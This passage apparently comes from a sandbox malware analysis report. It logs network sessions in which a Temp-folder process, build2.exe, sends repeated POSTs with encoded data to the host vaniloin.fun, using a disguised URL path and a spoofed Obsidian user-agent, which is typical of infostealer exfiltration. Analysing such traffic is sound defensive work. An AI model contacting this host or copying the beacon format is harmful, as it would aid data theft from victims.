2024-07-26 15:57:32 UTC	208	OUT	Data Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 01 08 00 00 00 95 00 00 00 19 25 59 04 93 00 00 00 59 12 03 70 3b dd 97 a9 00 00 00 00 06 00 00 00 32 4a b2 08 00 00 00 00 25 81 21 00 00 00 00 c4 00 00 00 32 4a b2 08 00 00 00 00 a0 96 0c 0c 58 00 00 00 00 00 00 00 5a 00 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 96 0c 0e 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 a0 96 0a 0c 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: %YYp;2J%!2JXZZ
2024-07-26 15:57:33 UTC	566	IN	HTTP/1.1 204 No Content Date: Fri, 26 Jul 2024 15:57:33 GMT Connection: close slug: ktXFBAA8pEqbLdzvFFQyZi39Ak7iUqVDm4sWK64zNUY/bDXe CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7sDB0mpbWgie6wD7rAWVcaxdYA%2B3j8ABdeBZEOWMk0KdpVk73SIjAizXX1Ac49uCPdD1tv4nCscsrAResI%2F73eTv2QtX2f8c7VRE0NUJOpVSc%2FGSlZskp1HIzKde2lI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9596087fba1902-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	61283	104.21.72.79	443	7964	C:\Users\user\AppData\Local\Temp\1000028001\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:57:35 UTC	518	OUT	POST /Windows-Users-in-Eastern-Europe-to-Get-2011-Time-Zone-Update-in-December-225923.shtml?kf5nnj6lqkqsr=IsoWRKeOa8NsT%2FySFnivv8d%2FUT%2BPShDyrbUKZ%2BFrcmUbempXtmTRVghRPnUtoJ3%2B8V7a63iBYUxISc7YAhztHQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) obsidian/1.4.13 Chrome/114.0.5735.289 Electron/25.8.1 Safari/537.36 id: ktXFBAA8pEqbLdzvFFQyZi39Ak7iUqVDm4sWK64zNUY/bDXe Content-Length: 683822 Host: vaniloin.fun
2024-07-26 15:57:35 UTC	15331	OUT	Data Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 01 08 00 00 00 1a 18 0a 00 77 12 11 30 93 00 00 00 59 12 03 70 3b dd 97 a9 00 00 00 00 cd 04 00 00 ee 24 22 60 00 00 00 00 27 81 21 25 29 4d 86 d0 e4 de da ca b3 6a 86 74 b8 aa e6 ca e4 e6 b8 c2 d8 cc de dc e6 b8 82 e0 e0 88 c2 e8 c2 b8 98 de c6 c2 d8 b8 8e de de ce d8 ca b8 86 d0 e4 de da ca b8 aa e6 ca e4 40 88 c2 e8 c2 23 2f 4f 88 ca cc c2 ea d8 e8 b3 7a 86 74 b8 aa e6 ca e4 e6 b8 c2 d8 cc de dc e6 b8 82 e0 e0 88 c2 e8 c2 b8 98 de c6 c2 d8 b8 8e de de ce d8 ca b8 86 d0 e4 de da ca b8 aa e6 ca e4 40 88 c2 e8 c2 b8 88 ca cc c2 ea d8 e8 b3 68 c6 d0 e4 de da d2 ea da be c4 e4 de ee e6 ca e4 e6 b8 86 d0 e4 de da ca b8 e0 e4 de cc d2 d8 ca e6 b8 88 ca cc c2 ea d8 e8 b8 98 de ce d2 dc 40 88 c2 e8 c2 b3 62 Data Ascii: w0Yp;$"`'!%)Mjt@#/Ozt@h@b
2024-07-26 15:57:35 UTC	15331	OUT	Data Raw: 86 8e d4 ea ac 98 d2 e2 b4 e0 6c ec 9a 9e d0 92 b2 72 66 ca 82 88 aa 68 6a 60 b2 84 94 da 90 ee 88 6a ce ee 9e a0 da 70 6a 6e 72 de e4 5e de ce 66 66 e6 6e ae ec a4 96 92 ca 6a d4 6e b2 62 de 62 92 6a 90 90 ce a2 a6 b2 c4 cc 70 98 c4 9c e8 e0 ea d0 e0 6c 64 66 c6 98 c8 e8 8a c8 e0 70 88 6e a2 d8 c6 c8 e0 e6 e0 ce c8 c2 e0 a2 cc c2 b2 ce 56 60 de 56 96 60 86 e2 64 90 8c c6 6e 60 e4 92 62 ea a2 da 9c a6 8e 72 60 8a ae e4 98 a4 a8 a2 96 d6 9c e4 de 86 d2 90 92 a6 92 ec b0 ae 9c d6 72 b4 6e ae e8 56 70 c2 96 dc b0 92 ce ca 64 6c 68 84 a2 5e ce c8 8a e4 d6 f0 92 a2 c8 e2 b4 94 8e a0 e8 e4 ee 90 ce f0 68 a6 62 ee 9a b4 d6 f0 6e a2 98 c8 ea b4 f0 a6 e4 aa 6c 6e a0 d4 56 86 a8 ea 96 90 de ea 64 ac a8 62 8c d8 d4 cc e0 aa 8e e4 ac 70 62 86 cc e2 de 92 e2 9e e6 66 Data Ascii: lrfhj`jpjnr^ffnjnbbjpldfpnV`V`dn`br`rnVpdlh^hbnlnVdbpbf
2024-07-26 15:57:35 UTC	15331	OUT	Data Raw: b0 aa ac d8 ce d0 a2 cc b4 62 8c a2 ea e4 f2 b0 a4 aa 8a e0 70 f0 9a e6 86 d6 e2 c4 72 6e 8a de 96 90 b0 ca f4 6c 96 ce 72 a0 d8 94 8c ce ae d8 60 8a 56 f0 96 86 d2 9c cc e0 e0 8c a2 c2 dc 60 9a f2 ee 96 a6 e2 ca cc b4 ac 82 de d8 8a 68 5e f0 6c 96 ce c8 a0 e0 6a 8c ce ae d8 60 f2 56 ee 96 86 d2 c8 5e d4 64 98 ce e8 98 e0 8c 62 d6 aa d8 8a 6c 5e f0 96 96 ce c8 a0 e0 d8 8c ce ae d8 60 6c 56 ee 96 86 d2 c8 cc e0 ac 8c a2 ca dc 60 c2 ee f2 96 90 96 b0 a8 cc 64 84 a4 aa 88 e4 72 9e de ea 86 60 ea d6 5e e6 d2 ce de dc b0 6c 88 a4 aa 90 e0 72 94 e6 e6 86 d6 e2 dc 5e 70 a6 d2 de 90 a8 6c 98 a4 b2 8c e0 c8 9c ec e6 f2 ce de dc cc 68 f4 d2 68 98 a6 6c b0 c6 b2 8c 90 d8 96 e0 72 72 d8 aa ac 82 6c 5e a4 6c 98 ce e8 98 e0 72 62 d6 aa d8 8a 6a 5e ee 96 96 ce c8 a0 e0 Data Ascii: bprnlr`V`h^lj`V^dbl^`lV`dr`^lr^plhhlrrl^lrbj^
2024-07-26 15:57:35 UTC	15331	OUT	Data Raw: 64 ea 88 d2 ae c2 60 e8 f2 c6 6c e0 ae d8 6c 8a ce 72 6a 90 c8 a0 ca cc c8 84 f0 66 84 ac ce dc 64 a0 72 66 ea d8 f0 e0 66 ea e8 64 a0 d6 94 62 ea 72 f0 b0 8c dc ae 6e ec 94 f2 ec ea 96 70 e8 ae cc ec d6 c6 b0 66 68 5e a2 c8 e8 ce d4 c8 6a 62 60 5e 8c ea d8 ac a2 5e 98 62 b0 d8 ea e4 98 a2 ec e4 ca d2 c6 64 72 d0 e4 ce d6 6a ae e0 ce e4 d4 c8 dc 86 66 82 aa 68 ae e0 d2 dc d0 98 d2 b0 84 8c b4 86 c4 84 d6 e6 dc f4 8c 98 d2 94 6e 5e 5e 72 ce 82 8e a2 a6 ea c2 6a 96 8e b4 dc f2 6a de 72 64 ae ac 6c 8c de a0 ce d4 f4 c2 92 ca ee 8e aa 64 e8 f2 e8 b4 c8 d2 e8 a8 de b2 8a a2 70 a2 68 68 6a ca a6 ca ac da d6 8c 68 b0 e2 d6 88 e6 6e 84 d8 e8 d4 a4 66 a8 d2 f2 a2 ce 60 6e 96 ae ae c2 aa a8 9c ae 8a ee 56 66 f4 e4 c6 f4 e2 e0 ca dc 86 c4 98 96 f4 64 86 f2 da c4 6c Data Ascii: d`llrjfdrffdbrnpfh^jb`^^bdrjfhn^^rjjrdldphhjhnf`nVfdl
2024-07-26 15:57:35 UTC	15331	OUT	Data Raw: c6 c8 ec 6e d2 98 8a 9e de d0 e0 e4 62 8a 90 ac 56 aa 84 98 ee 82 d8 aa ea c6 d4 c4 8c 5e e2 88 56 98 c6 a0 60 5e b0 a0 70 a0 62 5e 5e 88 72 cc 72 ee 5e a8 72 c6 5e ee 5e b0 5e 70 a0 62 5e 66 88 72 a0 62 f4 5e 88 72 cc 5e ee 5e b0 5e c6 a0 60 5e b0 a0 70 a0 62 5e 5e 88 72 cc 72 ee 5e a8 72 c6 5e ee 5e b0 5e 70 a0 62 5e 66 88 72 a0 62 f4 5e 88 72 cc 5e 9c 70 90 6c cc 6a 6c e8 5e f0 e6 ea b4 92 b0 ec 66 aa d6 ca f0 ee e6 8e de 84 a8 c2 82 62 88 94 92 6e 9e c2 92 e8 ac 90 aa d2 a0 8e f0 88 8a cc 96 ca 68 da 64 6a da 66 66 ae a4 e2 9a 88 98 60 f4 ce 72 72 66 84 68 d6 a2 e8 84 a0 70 d6 8c e0 86 a0 de e0 a0 da ce aa ce e8 6e 8c 84 64 aa ce 6c 96 cc 6a de 86 ee 8a ec b4 e6 a0 f2 d6 90 a2 ca 5e d2 ce a0 82 a6 72 d8 ee 70 e2 a2 9c 84 98 b0 8c 82 96 66 64 d0 6e 90 Data Ascii: nbV^V`^pb^^rr^r^^^pb^frb^r^^^`^pb^^rr^r^^^pb^frb^r^pljl^fbnhdjff`rrfhpndlj^rpfdn
2024-07-26 15:57:35 UTC	15331	OUT	Data Raw: d6 f2 de da 86 8a e4 d2 a2 6c 6a f4 aa aa 9c da 5e c4 88 68 de a4 94 90 8e 64 f4 de a0 c2 d4 84 c8 d4 98 9a 66 c4 6c a2 92 a4 d8 8a d2 e6 72 96 9e 90 c2 8a a8 6c c4 c6 c6 d2 a0 68 a8 e0 c6 c4 8a a6 9e 66 66 92 a4 ee f2 d2 94 9e 90 94 f0 ce 8a e0 72 8a d2 de ac e2 82 c2 5e 92 8c b4 94 b2 ec b2 de 64 dc 64 e2 9c 8e a4 aa 5e dc 66 8a 9c a6 70 ae d4 b2 de 8c 8e ce 60 a8 88 68 d2 ea e0 64 8e 90 f0 86 dc 70 a0 dc ec ae 98 ea d6 cc d0 84 ea 5e 86 d8 66 9c c8 9e 84 9e 8e 8e 56 f4 84 d0 f0 6e 9e d0 60 82 96 ce e4 6e ce d4 b4 ae a8 e0 e8 62 70 c4 da 9a ac 8a c8 86 9c ac c6 d4 96 c4 c2 f0 d0 ec 98 96 a2 e8 66 6a 92 64 d4 d8 94 a2 d6 f4 ce 6e c4 ae c6 a2 6a 9e c2 88 6c 5e f0 ec d2 8c ee a8 9c a4 72 9c e4 5e e0 84 e8 f0 86 5e cc cc b4 94 9c 9c 6c 88 f0 ae f2 92 60 6e Data Ascii: lj^hdflrlhffr^dd^fp`hdp^fVn`nbpfjdnjl^r^^l`n
2024-07-26 15:57:35 UTC	15331	OUT	Data Raw: 90 92 d2 64 6c ca d4 8e e8 8a c8 e6 82 84 90 c6 60 da 6c 86 c8 a6 64 68 c6 86 d8 a6 72 a4 96 d0 f2 a0 86 de 64 94 e2 d2 a6 d2 62 f2 d0 da e0 e6 de ac 9c 82 b4 a4 ea a6 88 d2 f0 ac ea a0 f4 88 d6 da c6 9c 6a 90 b0 f0 84 c4 ac 66 a4 c6 96 b4 e6 a4 aa 9a d4 86 56 70 90 c2 98 82 e8 72 f2 ce 6c 6c ec 94 b0 84 6e e8 70 66 d8 9e e8 a4 9e 8c 68 72 d8 c8 84 96 e2 c6 82 de cc de d8 86 e0 a4 b0 ec 60 a4 a4 d2 e8 aa ec c6 c8 d0 f2 9a da f0 5e a8 94 90 de ac dc de f0 a4 ae 96 d6 8a b2 ce e0 8a de 70 e4 94 70 86 e8 90 60 96 88 d0 9e e0 d6 a6 56 ce ea ce c2 6c cc ac ac c4 a8 9e 86 f2 72 c2 64 e8 de cc 98 60 9e d4 a8 90 6e a2 9a 60 a0 86 b0 c4 c8 56 9e da 60 cc 60 c8 8a 9c f2 d8 aa d8 60 e6 e8 6e a4 aa a2 ec 70 8a ec 96 8c c2 90 66 a0 70 88 ee 56 8c de 82 d6 6a ea e6 b2 Data Ascii: dl`ldhrdbjfVprllnpfhr`^pp`Vlrd`n`V```npfpVj
2024-07-26 15:57:35 UTC	15331	OUT	Data Raw: 88 66 64 a2 c2 ee ec 6c ca 6a b2 6a d8 9c d4 9a 86 c8 ca 6a f2 6a 66 64 dc b0 98 f4 f2 98 d0 e6 da a4 d0 ec a2 c6 64 6a a0 c6 64 90 6a ea 72 98 de b2 56 66 ea a4 a4 8a aa a6 8c aa dc aa ea d2 b0 e2 96 9c e8 98 8a 9a 70 9c ec c8 98 e6 d2 72 b4 5e 64 ca cc e4 ca 90 f0 56 ea d0 72 c2 64 b2 6a 90 d6 c4 a0 6a b0 ce 88 cc 66 f0 5e f0 cc c6 a8 66 da 70 d4 66 e4 64 aa ca 6c 86 ac d2 e6 e0 d8 9a 68 c4 da b4 dc a2 cc 56 62 5e 9a ec f0 a8 b4 8c da b2 70 f2 9a f4 72 ce 6a dc f4 8a f4 84 8a f4 c4 f2 92 f4 5e 72 da 60 6a 5e 8c de d4 6a dc cc 70 e8 6c b0 b2 d0 8e dc a4 b4 f2 64 d2 b4 ee 64 e2 e8 c2 8a ce ac e4 c4 8e a8 8c c4 f0 8e f2 c4 f0 64 f4 72 68 86 ee 56 68 d6 8e 56 c6 c6 e4 b0 ce 5e f2 62 64 9e d4 ae 62 a6 a2 da 86 70 aa a8 de a6 d4 ec d4 ee d0 f0 c8 96 c4 e6 e0 Data Ascii: fdljjjjfddjdjrVfpr^dVrdjjf^fpfdlhVb^prj^r`j^jpldddrhVhV^bdbp
2024-07-26 15:57:35 UTC	15331	OUT	Data Raw: 82 ae d2 9c d8 60 ee 88 88 9e cc 92 70 68 9a 64 a4 ac 84 a2 94 ca 88 86 b2 b4 ae f4 f2 ce d2 e8 96 a6 d6 b4 c8 82 a2 a0 d2 de 6c c2 a8 dc 8a a6 92 d0 e8 ca b0 ce ec da 84 c2 6c ce e4 e8 6a 84 9c 68 d2 cc 88 ca 68 a4 e2 d6 c6 62 84 e8 68 82 c6 e0 a8 aa c6 82 66 9a 9c ee 86 b2 dc c4 92 dc da 8a 92 9a d0 a2 6e c4 96 9a 8e 84 86 d2 e0 90 94 8a 8c 9e 8e b4 ce c2 dc d4 e2 9a d8 8e 9c c6 8c ea ce 82 d4 ae f2 c4 c6 9a 84 b0 66 d6 ac 5e 86 6c da c6 d4 d6 94 dc ce 62 60 a8 84 c2 84 92 ac f0 5e da 8e 84 c8 62 e2 84 c6 e6 94 f0 c6 a0 ce 9a 98 de e0 8c ac 82 de 70 6a e6 d0 aa 8e ae ee b0 b0 88 72 b2 8e a8 e4 9e 8a f2 82 8a ae a2 68 ae 98 82 d2 e6 8e 9e 60 e8 68 a8 aa dc d8 de cc 70 9a f2 86 c4 86 c4 d0 ce 64 88 d2 88 d0 96 64 c8 62 84 9c e2 d2 a6 ea 98 a0 98 9c f0 d4 Data Ascii: `phdlljhhbhfnf^lb`^bpjrh`hpddb
2024-07-26 15:57:35 UTC	15331	OUT	Data Raw: da 88 82 64 96 66 e4 9e a2 82 ca da e0 60 ca 6a 9a 90 92 ec d2 e6 82 e2 a8 e6 ae b4 d0 62 d8 5e 68 f2 66 e2 a0 ea 86 64 66 ae 64 62 6c a6 f0 c8 ce f4 dc cc 9e 88 9c 56 f0 e2 d4 5e ca 6c 96 70 cc 8e ae 6c 8a a8 c8 f2 ce a0 84 f4 b4 9c c8 ec 88 6e e0 de f0 a0 ac 64 9c 5e aa f4 a8 ac 92 64 8a 5e aa f4 d4 d4 90 90 d0 56 94 8a d4 6e e2 a0 9a a6 d8 98 62 d6 c8 b2 b4 68 66 d4 e6 ce d2 8a f4 ea a0 a2 ac a0 82 b2 60 b2 a2 ae a0 a4 b4 ca 56 ce d0 cc 84 8c 6e 9e 86 f0 70 86 aa 6e 70 c4 e6 94 ac e0 da f0 6e 88 8a a4 ac 64 96 f0 ec d8 ec dc f0 d6 ae 82 d4 f2 f0 cc 9e a8 f0 9a 60 6c 6a 64 8c e0 e0 d6 66 de a2 6a ec a0 a6 6e d8 6e 92 ae ec e4 c8 96 a0 e2 c8 70 cc c6 90 ee 6a 6a da 94 f0 5e cc c6 aa f0 62 ee a4 88 8a cc 96 86 6c b2 98 d0 f0 a8 90 b0 84 da 9c b4 86 cc 9e Data Ascii: df`jb^hfdfdblV^lplnd^d^Vnbhf`Vnpnpnd`ljdfjnnpjj^bl
2024-07-26 15:57:36 UTC	572	IN	HTTP/1.1 204 No Content Date: Fri, 26 Jul 2024 15:57:36 GMT Connection: close slug: ktXFBAA8pEqbLdzvFFQyZi39Ak7iUqVDm4sWK64zNUY/bDXe CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8mrPWkGIPRac9N2cPDJTRmCvsk65%2BEtUnr5p%2BcNpRDIE%2BC26BQIdGrlfY6EY0M%2FHk0Ip5T9WhD2THk9XCTTg58vvI4UChYpfv2q60cmtozk7u%2BHt66MJ%2Fvquj4xIh1Y%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a959617bf8243dd-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	61289	104.21.72.79	443	7964	C:\Users\user\AppData\Local\Temp\1000028001\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:57:37 UTC	515	OUT	POST /Windows-Users-in-Eastern-Europe-to-Get-2011-Time-Zone-Update-in-December-225923.shtml?kf5nnj6lqkqsr=IsoWRKeOa8NsT%2FySFnivv8d%2FUT%2BPShDyrbUKZ%2BFrcmUbempXtmTRVghRPnUtoJ3%2B8V7a63iBYUxISc7YAhztHQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) obsidian/1.4.13 Chrome/114.0.5735.289 Electron/25.8.1 Safari/537.36 id: ktXFBAA8pEqbLdzvFFQyZi39Ak7iUqVDm4sWK64zNUY/bDXe Content-Length: 745 Host: vaniloin.fun
2024-07-26 15:57:37 UTC	745	OUT	Data Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 01 08 00 00 00 95 00 00 00 71 09 16 08 93 00 00 00 59 12 03 70 3b dd 97 a9 00 00 00 00 06 00 00 00 e2 12 2c 10 00 00 00 00 25 81 21 00 00 00 00 c4 00 00 00 e2 12 2c 10 00 00 00 00 a0 96 0c 0c 58 00 00 00 00 00 00 00 5a 00 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 96 0c 0e 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 a0 96 0a 0c 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 08 00 00 00 a7 00 00 00 98 76 bf 09 93 00 00 00 59 12 03 70 3b dd 97 a9 00 00 00 00 2a 00 00 00 31 ec 7f 12 00 00 00 00 25 81 25 2b 81 04 02 47 25 81 00 41 2b 81 02 02 47 25 81 00 41 00 00 Data Ascii: qYp;,%!,XZZvYp;*1%%+G%A+G%A
2024-07-26 15:57:38 UTC	564	IN	HTTP/1.1 204 No Content Date: Fri, 26 Jul 2024 15:57:38 GMT Connection: close slug: ktXFBAA8pEqbLdzvFFQyZi39Ak7iUqVDm4sWK64zNUY/bDXe CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YoCr9rS3JCPxZpsLjsDNB1Y6wDp%2FseQ4zRHS9MiasH7RGMEZiLDZBJNJW64vFnBBz%2B1BQkvdviVAVeVPaXXO0eNVQum0pk84bzYXwyk3tTG1PF8mhGmBH6T9VJFQdOA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a959628088f8c6c-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	61293	104.21.72.79	443	7964	C:\Users\user\AppData\Local\Temp\1000028001\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:57:39 UTC	515	OUT	POST /Windows-Users-in-Eastern-Europe-to-Get-2011-Time-Zone-Update-in-December-225923.shtml?kf5nnj6lqkqsr=IsoWRKeOa8NsT%2FySFnivv8d%2FUT%2BPShDyrbUKZ%2BFrcmUbempXtmTRVghRPnUtoJ3%2B8V7a63iBYUxISc7YAhztHQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) obsidian/1.4.13 Chrome/114.0.5735.289 Electron/25.8.1 Safari/537.36 id: ktXFBAA8pEqbLdzvFFQyZi39Ak7iUqVDm4sWK64zNUY/bDXe Content-Length: 212 Host: vaniloin.fun
2024-07-26 15:57:39 UTC	212	OUT	Data Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 01 08 00 00 00 99 00 00 00 2b 9e e3 04 93 00 00 00 59 12 03 70 3b dd 97 a9 00 00 00 00 0e 00 00 00 56 3d c7 08 00 00 00 00 27 81 81 25 81 23 00 00 00 00 00 c4 00 00 00 56 3d c7 08 00 00 00 00 a0 96 0c 0c 58 00 00 00 00 00 00 00 5a 00 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 96 0c 0e 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 a0 96 0a 0c 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: +Yp;V='%#V=XZZ
2024-07-26 15:57:39 UTC	572	IN	HTTP/1.1 204 No Content Date: Fri, 26 Jul 2024 15:57:39 GMT Connection: close slug: ktXFBAA8pEqbLdzvFFQyZi39Ak7iUqVDm4sWK64zNUY/bDXe CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fAks8sK%2FlHJp5f5OeBZ3R3%2BTcetT%2FWCUKxE5uEzfDdee43a0JqTNbcgmrbu0M3JU%2BYcSodbxqiYq%2FOUgsuOGpIAM%2FIYJUmovxnb0NqxAk8HHHQ6fqdj1Fm89jWqrQzA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9596307914c340-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	61295	104.21.72.79	443	7964	C:\Users\user\AppData\Local\Temp\1000028001\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:57:40 UTC	514	OUT	POST /Windows-Users-in-Eastern-Europe-to-Get-2011-Time-Zone-Update-in-December-225923.shtml?kf5nnj6lqkqsr=IsoWRKeOa8NsT%2FySFnivv8d%2FUT%2BPShDyrbUKZ%2BFrcmUbempXtmTRVghRPnUtoJ3%2B8V7a63iBYUxISc7YAhztHQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) obsidian/1.4.13 Chrome/114.0.5735.289 Electron/25.8.1 Safari/537.36 id: ktXFBAA8pEqbLdzvFFQyZi39Ak7iUqVDm4sWK64zNUY/bDXe Content-Length: 35 Host: vaniloin.fun
2024-07-26 15:57:40 UTC	35	OUT	Data Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 01 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii:
2024-07-26 15:57:40 UTC	572	IN	HTTP/1.1 204 No Content Date: Fri, 26 Jul 2024 15:57:40 GMT Connection: close slug: ktXFBAA8pEqbLdzvFFQyZi39Ak7iUqVDm4sWK64zNUY/bDXe CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rNrbU%2BXyzUW1dJNpidKYy6zQIUx3XLy72%2FXN%2B1N91nGrA3h32TWw%2B3yXsZzArDiX2nKq5nBLsoNe64AQKMM38BHfYu7ubIDDRTe0WeKy4YZMZDVWYF7%2Be%2BkmEymvQcU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a959635ca7978e7-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	61299	104.21.72.79	443	7964	C:\Users\user\AppData\Local\Temp\1000028001\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:57:41 UTC	518	OUT	POST /Windows-Users-in-Eastern-Europe-to-Get-2011-Time-Zone-Update-in-December-225923.shtml?kf5nnj6lqkqsr=IsoWRKeOa8NsT%2FySFnivv8d%2FUT%2BPShDyrbUKZ%2BFrcmUbempXtmTRVghRPnUtoJ3%2B8V7a63iBYUxISc7YAhztHQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) obsidian/1.4.13 Chrome/114.0.5735.289 Electron/25.8.1 Safari/537.36 id: ktXFBAA8pEqbLdzvFFQyZi39Ak7iUqVDm4sWK64zNUY/bDXe Content-Length: 115630 Host: vaniloin.fun
2024-07-26 15:57:41 UTC	15331	OUT	Data Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 01 08 00 00 00 73 c3 01 00 e4 18 67 1f 93 00 00 00 59 12 03 70 3b dd 97 a9 00 00 00 00 8d 1e 00 00 c9 30 ce 3e 00 00 00 00 37 81 4d 64 62 60 66 72 6a 4d c2 d8 cc de dc e6 27 14 00 9b 94 ca 23 25 9b 0a 00 9b 08 00 9f 00 00 00 02 ff e9 00 00 b3 4c 92 dc e8 ca d8 50 a4 52 40 86 de e4 ca 50 a8 9a 52 64 40 86 a0 aa 40 6c 6c 60 60 40 80 40 64 5c 68 60 40 8e 90 f4 23 7f 9a d2 c6 e4 de e6 de cc e8 40 84 c2 e6 d2 c6 40 88 d2 e6 e0 d8 c2 f2 40 82 c8 c2 e0 e8 ca e4 81 87 b9 00 6f 41 4d a6 f2 e6 e8 ca da 51 a4 ca ce d2 e6 e8 e4 f2 51 e6 da e6 e6 5c ca f0 ca 53 c6 e6 e4 e6 e6 5c ca f0 ca 57 ee d2 dc d2 dc d2 e8 5c ca f0 ca 53 c6 e6 e4 e6 e6 5c ca f0 ca 59 ee d2 dc d8 de ce de dc 5c ca f0 ca 59 e6 ca e4 ec d2 c6 ca Data Ascii: sgYp;0>7Mdb`frjM'#%LPR@PRd@@ll``@@d\h`@#@@@oAMQQ\S\W\S\Y\Y
2024-07-26 15:57:41 UTC	15331	OUT	Data Raw: 01 15 27 ae e2 81 59 61 0e eb 18 63 cb 7d 43 a6 83 4f e5 59 53 25 0e c7 35 ca 6b 35 0f b9 07 60 3c 9d 7e a5 b4 54 49 40 5a 78 8a 5f 7e 1d 88 36 6c 96 0d 7f 05 d3 86 86 61 a1 d9 cc 87 7e d6 5f e2 80 29 dd 4b ba 5e ec c9 0e 1c d1 7e 8a 99 d4 c7 00 83 02 d8 9e 76 1c d1 9e 85 02 67 79 2f 43 0d 39 de 7a 88 98 4b 71 20 f7 38 11 7b cf 22 25 04 8c 8d 95 6e 16 54 2b 24 67 f2 39 bf bf 7b ba 19 49 d5 23 cc 55 a0 80 7b ec d1 2b f3 ab b8 92 bd e0 66 9b 8c e8 4d ad dd 01 32 0b 9d 55 1a ee 04 47 76 54 b1 81 a8 b5 60 2e a6 d5 ba bf fd 21 b3 e8 aa df 88 e7 fa 54 9c 44 79 2a cd a0 97 6b 2e 47 4a 89 ef ae 7d dc 0d db 3d b5 ac 4e ba 11 57 d9 39 de 76 2f d7 f6 c7 00 c5 18 ba 38 21 32 29 03 2b 85 05 64 ec e7 0b 68 9f e0 80 32 1c d1 d0 d4 5d 8c a8 f8 86 e9 3f 95 d9 96 62 dc 94 Data Ascii: 'Yac}COYS%5k5`<~TI@Zx_~6la~_)K^~vgy/C9zKq 8{"%nT+$g9{I#U{+fM2UGvT`.!TDy*k.GJ}=NW9v/8!2)+dh2]?b
